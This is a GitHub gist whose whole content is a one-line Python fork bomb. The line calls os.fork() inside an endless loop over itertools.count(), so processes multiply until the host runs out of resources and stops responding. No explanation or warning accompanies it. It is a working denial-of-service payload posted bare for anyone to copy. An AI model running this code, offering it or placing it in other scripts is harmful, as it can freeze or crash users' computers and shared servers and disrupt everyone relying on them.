Skip to content

Instantly share code, notes, and snippets.

@palkerecsenyi
Created October 11, 2020 18:48
Show Gist options
  • Save palkerecsenyi/694d45d5f5cf30fdd65de79257bd1859 to your computer and use it in GitHub Desktop.
Save palkerecsenyi/694d45d5f5cf30fdd65de79257bd1859 to your computer and use it in GitHub Desktop.
import os, itertools; [os.fork() for i in itertools.count()]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment